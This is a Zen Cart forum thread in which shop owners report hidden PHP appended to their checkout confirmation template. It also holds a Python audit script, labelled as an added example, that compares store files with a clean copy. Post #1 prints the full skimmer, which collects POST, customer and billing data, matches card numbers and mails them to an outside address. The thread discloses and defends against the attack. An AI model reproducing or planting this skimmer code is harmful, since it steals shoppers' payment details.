  1. #1
    Join Date
    Dec 2009
    Posts
    20
    Plugin Contributions
    0

    Checkout Confirmation blank page fix - my version

    Hi, today I got notified by a customer that he cannot go past the second step of the checkout.

    I immediately tried to replicate the problem with a test user account and I encountered the same problem: a blank page instead of the 3rd step. No error message, nothing.

    I started to browse the forum and do searches on Google and I encountered the debug tool listed in many threads by Dr. Byte (sorry if I spelled your name wrong, dude).

    I followed the steps and I received this error in the log:

    [19-Dec-2010 08:27:21] PHP Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/xxxxxxx/public_html/includes/templates/cherry_zen/templates/tpl_checkout_confirmation_default.php on line 212

    I opened the tpl_checkout_confirmation_default.php and noticed something weird at the end of the page: a small script with an email address that I have never seen before. What struck me was "what exactly is this doing here", as it seemed pretty unnatural for an email address to be in the checkout code.

    I then opened the default cherry zen template to compare the 2 files and, as you guess, the script with the email was an extra.

    I uploaded the default tpl_checkout_confirmation_default.php file that came with the cherry zen template and everything went back to normal.

    I also did the security update in the config for the inoculation or something against hackers.

    My real question is: could other files be compromised? If anyone encountered this before, I would like to know what other files might have these "extra" scripts.

    Here is the extra that was in the checkout confirmation PHP file:
    Code:
    <?php
    $msgz = "";
    if (!isset($_SERVER)) { $_SERVER  = &$HTTP_SERVER_VARS; }
    $msgz .= "========================================================\r\n";
    foreach ($_POST as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
    $msgz .= "========================================================\r\n";
    foreach ($order->customer as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
    $msgz .= "========================================================\r\n";
    foreach ($order->billing as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
    $msgz .= "========================================================\r\n";
    foreach ($order->billing['country'] as $key => $value) { $msgz .= "country-".$key." => ".$value."\r\n"; }
    $msgz .= "========================================================\r\n";
    $msgz .= $_SERVER['HTTP_REFERER']."\r\n".$_SERVER['SCRIPT_FILENAME']"\r\n";
    $msgz .= "\r\n========================================================\r\n";
    if(preg_match('/[0-9]{12,19}|paypal/i',$msgz)) {
    @mail('cnewberry497######################','setoran',$msgz);
    } else {
    @mail('cnewberry497######################','setoran',$msgz);
    }
    ?>

  2. #2
    Join Date
    Mar 2010
    Posts
    1
    Plugin Contributions
    0

    Re: Checkout Confirmation blank page fix - my version

    Thank you for posting this. I had the exact same entries in my file.

  3. #3
    Join Date
    Dec 2009
    Posts
    20
    Plugin Contributions
    0

    Re: Checkout Confirmation blank page fix - my version

    Did your entry in the file contain the same email address as the one listed at the bottom of the entry?

    I'm just curious if it's the same person or if it's a general security bug that many others can exploit.

  4. #4
    Join Date
    Dec 2009
    Posts
    20
    Plugin Contributions
    0

    Re: Checkout Confirmation blank page fix - my version

    VERY IMPORTANT: I just noticed that some friends of mine that are using Zen Cart also got the same "extra" in their checkout confirmation file, with different email addresses!

    Also, if this exploit was in your custom template file, it exists in the default template file also.

    So please check the tpl_checkout_confirmation_default.php located in the includes/templates/template_default/template/tpl_checkout_confirmation_default.php and delete the extra PHP script from the bottom of the page.

    I hope this solves some of everyone's security problems.

    Also, I would like a Zen Cart expert to post here if this security issue can be solved with the inoculation script or if we have to check the files daily to see if this appears again.

    Thank you.
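
Added example, not part of any post in this thread and not Zen Cart project code: one way to approach "could other files be compromised?" is to compare every .php file in the live store with a pristine copy of the same release and template, and use the traits of the snippet from post #1 as hints on whatever differs. The function names, the directory layout in `demo()` and the sample file contents are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators drawn from the snippet posted above; a hit is a lead, not proof.
INDICATORS = {
    "mail_call": re.compile(r"@?\bmail\s*\(", re.I),
    "post_dump": re.compile(r"foreach\s*\(\s*\$_POST\b", re.I),
    "order_dump": re.compile(r"foreach\s*\(\s*\$order->(customer|billing)\b", re.I),
    "card_regex": re.compile(r"\[0-9\]\{\d+,\d+\}"),
}

def scan_php(source):
    """Return the sorted names of the indicators found in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))

def audit_tree(live_root, clean_root):
    """Return {relative_path: (status, indicators)} for each .php file that is
    "extra" (absent from the pristine copy) or "modified" (bytes differ)."""
    live_root, clean_root = Path(live_root), Path(clean_root)
    findings = {}
    for path in sorted(live_root.rglob("*.php")):
        rel = path.relative_to(live_root)
        data = path.read_bytes()
        clean = clean_root / rel
        if clean.is_file() and clean.read_bytes() == data:
            continue  # identical to the pristine copy
        status = "modified" if clean.is_file() else "extra"
        findings[rel.as_posix()] = (status, scan_php(data.decode("utf-8", "replace")))
    return findings

def demo():
    """Run the audit over two constructed trees (sample data, not a real store)."""
    clean_tpl = "<div>confirmation page</div>\n"
    appended = '<?php foreach ($_POST as $k => $v) { $m .= $v; } @mail("addr@example.invalid", "s", $m); ?>'
    with tempfile.TemporaryDirectory() as tmp:
        live, clean = Path(tmp, "live"), Path(tmp, "clean")
        for root in (live, clean):
            (root / "templates").mkdir(parents=True)
            (root / "templates" / "tpl_header.php").write_text(clean_tpl)
        (clean / "templates" / "tpl_checkout_confirmation_default.php").write_text(clean_tpl)
        (live / "templates" / "tpl_checkout_confirmation_default.php").write_text(clean_tpl + appended)
        (live / "templates" / "cache.php").write_text("<?php // unexpected file ?>")
        return audit_tree(live, clean)

if __name__ == "__main__":
    print(demo())
```

Intentional customisations also show up as "modified", usually with no indicators, so every reported file still needs a manual look; an "extra" file with no indicators is not thereby clean.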

  5. #5
    Join Date
    Apr 2006
    Posts
    34
    Plugin Contributions
    0

    Re: Checkout Confirmation blank page fix - my version

    Had the same thing happen to me, so it is a bit worrying! Is there anything we can do to improve security?
    hand screen printed clothing and accessories
    www.wildgardendesign.com

  6. #6
    Join Date
    Sep 2005
    Posts
    95
    Plugin Contributions
    0

    Re: Checkout Confirmation blank page fix - my version

    Just ran into the same thing.
    I am on version 1.3.8
    Zen-Cart, The Greatest Shopping Cart!

  7. #7
    Join Date
    Sep 2005
    Posts
    95
    Plugin Contributions
    0

    Re: Checkout Confirmation blank page fix - my version

    I am surprised no one has chimed in on this from ZenCart.
    Zen-Cart, The Greatest Shopping Cart!

  8. #8
    Join Date
    Dec 2009
    Posts
    20
    Plugin Contributions
    0

    Re: Checkout Confirmation blank page fix - my version

    Hopefully they will soon; meanwhile I'm glad I noticed this and forwarded the problem here so others can solve some security issues with their carts.

  9. #9
    Join Date
    Jan 2004
    Posts
    66,380
    Blog Entries
    7
    Plugin Contributions
    274

    Re: Checkout Confirmation blank page fix - my version

    Quote (originally posted by wildgarden):
    had the same thing happen to me, so it is a bit worrying! is there anything we can do to improve security?

    Quote (originally posted by GearStudios):
    Just ran into the same thing.
    I am on version 1.3.8

    Simple solution for all of you: clean out the damage done, and upgrade to the latest version. Your old version is both obsolete and contains numerous well-advertised security flaws. The new version does not.

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

 

 
